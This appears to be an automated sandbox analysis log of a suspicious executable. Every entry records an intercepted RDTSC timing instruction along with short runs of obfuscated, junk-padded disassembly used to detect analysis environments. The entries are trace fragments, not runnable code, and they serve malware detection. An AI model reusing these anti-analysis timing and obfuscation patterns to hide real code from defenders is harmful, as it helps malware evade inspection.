Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 98BF65 second address: 98BF6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 98BF6B second address: 98BF6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 98BC61 second address: 98BC82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD8Ch 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FEE851EFD8Ch 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 98BC82 second address: 98BCA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEE84E88FCFh 0x00000009 push esi 0x0000000a pop esi 0x0000000b jc 00007FEE84E88FC6h 0x00000011 popad 0x00000012 popad 0x00000013 push esi 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 98BCA4 second address: 98BCA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 999E21 second address: 999E38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FEE84E88FCFh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 99EE40 second address: 99EE65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ebx 0x00000007 jnc 00007FEE851EFD94h 0x0000000d push eax 0x0000000e push edx 0x0000000f jc 00007FEE851EFD86h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9A4FA4 second address: 9A4FA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9A524D second address: 9A5263 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jo 00007FEE851EFD86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 jo 00007FEE851EFD86h 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9A53A9 second address: 9A53AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9A53AD second address: 9A53B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9A5519 second address: 9A551D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9A551D second address: 9A552C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD8Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9A56AD second address: 9A56BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jg 00007FEE84E88FE9h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9A950F second address: 9A9517 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9A91B9 second address: 9A91ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEE84E88FD9h 0x00000009 jc 00007FEE84E88FC6h 0x0000000f popad 0x00000010 push esi 0x00000011 jmp 00007FEE84E88FCEh 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9A91ED second address: 9A9209 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEE851EFD98h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9A9209 second address: 9A920D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9C9B77 second address: 9C9BB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD93h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FEE851EFD99h 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 jmp 00007FEE851EFD8Dh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9CC02D second address: 9CC031 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9CC031 second address: 9CC03B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FEE851EFD86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9CC03B second address: 9CC040 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9CC040 second address: 9CC049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9CC049 second address: 9CC04F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9CC04F second address: 9CC061 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FEE851EFD86h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9E3445 second address: 9E3451 instructions: 0x00000000 rdtsc 0x00000002 je 00007FEE84E88FC6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9E3451 second address: 9E3457 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9E3457 second address: 9E345D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9E345D second address: 9E3461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9E3461 second address: 9E347B instructions: 0x00000000 rdtsc 0x00000002 jc 00007FEE84E88FC6h 0x00000008 jng 00007FEE84E88FC6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 je 00007FEE84E88FC6h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9E347B second address: 9E347F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9E3CDC second address: 9E3CE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FEE84E88FC6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9E3CE7 second address: 9E3CED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9E3CED second address: 9E3CF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9E3CF3 second address: 9E3CF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9E3CF7 second address: 9E3D0B instructions: 0x00000000 rdtsc 0x00000002 jno 00007FEE84E88FC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007FEE84E88FC6h 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9E4191 second address: 9E4199 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9E4199 second address: 9E41B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEE84E88FD4h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9E5E23 second address: 9E5E2D instructions: 0x00000000 rdtsc 0x00000002 je 00007FEE851EFD8Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9E7589 second address: 9E758D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 8B3D4A second address: 8B3D50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9EA173 second address: 9EA17D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FEE84E88FC6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9EB843 second address: 9EB84A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 9EF1F8 second address: 9EF1FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52E0008 second address: 52E000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52E000C second address: 52E0010 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52E0010 second address: 52E0016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52E0016 second address: 52E001C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52E001C second address: 52E0020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52E0020 second address: 52E00A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FCEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d jmp 00007FEE84E88FCEh 0x00000012 movzx ecx, dx 0x00000015 popad 0x00000016 push eax 0x00000017 jmp 00007FEE84E88FCCh 0x0000001c xchg eax, ebp 0x0000001d pushad 0x0000001e call 00007FEE84E88FCEh 0x00000023 pushfd 0x00000024 jmp 00007FEE84E88FD2h 0x00000029 and esi, 0BFDA2F8h 0x0000002f jmp 00007FEE84E88FCBh 0x00000034 popfd 0x00000035 pop ecx 0x00000036 mov al, bh 0x00000038 popad 0x00000039 mov ebp, esp 0x0000003b jmp 00007FEE84E88FD0h 0x00000040 pop ebp 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52E00A7 second address: 52E00AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52E00AB second address: 52E00AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52E00AF second address: 52E00B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52E00B5 second address: 52E00BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52D0053 second address: 52D00C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FEE851EFD94h 0x00000012 xor ax, 3CD8h 0x00000017 jmp 00007FEE851EFD8Bh 0x0000001c popfd 0x0000001d call 00007FEE851EFD98h 0x00000022 push eax 0x00000023 pop edi 0x00000024 pop eax 0x00000025 popad 0x00000026 pop ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FEE851EFD98h 0x0000002e rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 5300F67 second address: 5300F7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A0110 second address: 52A0160 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FEE851EFD8Eh 0x0000000f push eax 0x00000010 jmp 00007FEE851EFD8Bh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FEE851EFD95h 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A0160 second address: 52A017D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A017D second address: 52A0183 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A0183 second address: 52A0189 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A0189 second address: 52A018D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A018D second address: 52A0191 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A0191 second address: 52A01DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+04h] 0x0000000b jmp 00007FEE851EFD98h 0x00000010 push dword ptr [ebp+0Ch] 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FEE851EFD8Eh 0x0000001a adc esi, 347264B8h 0x00000020 jmp 00007FEE851EFD8Bh 0x00000025 popfd 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 pop edx 0x0000002a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A0218 second address: 52A021E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52A021E second address: 52A0224 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52C0956 second address: 52C099F instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FEE84E88FD8h 0x00000008 sbb ecx, 58398EC8h 0x0000000e jmp 00007FEE84E88FCBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 call 00007FEE84E88FD8h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52C099F second address: 52C09D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov ebp, esp 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007FEE851EFD8Dh 0x0000000f adc eax, 1D535E96h 0x00000015 jmp 00007FEE851EFD91h 0x0000001a popfd 0x0000001b mov di, ax 0x0000001e popad 0x0000001f pop ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52C09D9 second address: 52C09E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52C09E8 second address: 52C09EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52C07F9 second address: 52C0829 instructions: 0x00000000 rdtsc 0x00000002 mov dx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FEE84E88FD6h 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FEE84E88FCEh 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52C0829 second address: 52C08B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FEE851EFD91h 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d pushad 0x0000000e call 00007FEE851EFD98h 0x00000013 pushad 0x00000014 popad 0x00000015 pop eax 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FEE851EFD93h 0x0000001d sub ah, 0000006Eh 0x00000020 jmp 00007FEE851EFD99h 0x00000025 popfd 0x00000026 popad 0x00000027 popad 0x00000028 mov ebp, esp 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FEE851EFD98h 0x00000033 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52C08B0 second address: 52C08BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE84E88FCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52C08BF second address: 52C08C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52C08C5 second address: 52C08C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52C0575 second address: 52C057A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52D0367 second address: 52D03CC instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FEE84E88FD5h 0x00000008 add ax, B696h 0x0000000d jmp 00007FEE84E88FD1h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 jmp 00007FEE84E88FCEh 0x0000001c push eax 0x0000001d jmp 00007FEE84E88FCBh 0x00000022 xchg eax, ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FEE84E88FD5h 0x0000002a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52D03CC second address: 52D040B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEE851EFD91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FEE851EFD8Eh 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FEE851EFD97h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52D040B second address: 52D0412 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 5300E24 second address: 5300E34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEE851EFD8Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 5300E34 second address: 5300EA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a call 00007FEE84E88FCAh 0x0000000f pushfd 0x00000010 jmp 00007FEE84E88FD2h 0x00000015 sub cx, 8DB8h 0x0000001a jmp 00007FEE84E88FCBh 0x0000001f popfd 0x00000020 pop eax 0x00000021 pushfd 0x00000022 jmp 00007FEE84E88FD9h 0x00000027 sbb al, 00000056h 0x0000002a jmp 00007FEE84E88FD1h 0x0000002f popfd 0x00000030 popad 0x00000031 mov dword ptr [esp], ebp 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 5300EA6 second address: 5300EAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52E03EB second address: 52E03F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52E03F1 second address: 52E03F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52E03F5 second address: 52E03F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52E03F9 second address: 52E0416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e call 00007FEE851EFD8Eh 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52E0416 second address: 52E043D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 and dword ptr [eax], 00000000h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FEE84E88FD9h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe RDTSC instruction interceptor: First address: 52E043D second address: 52E0441 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
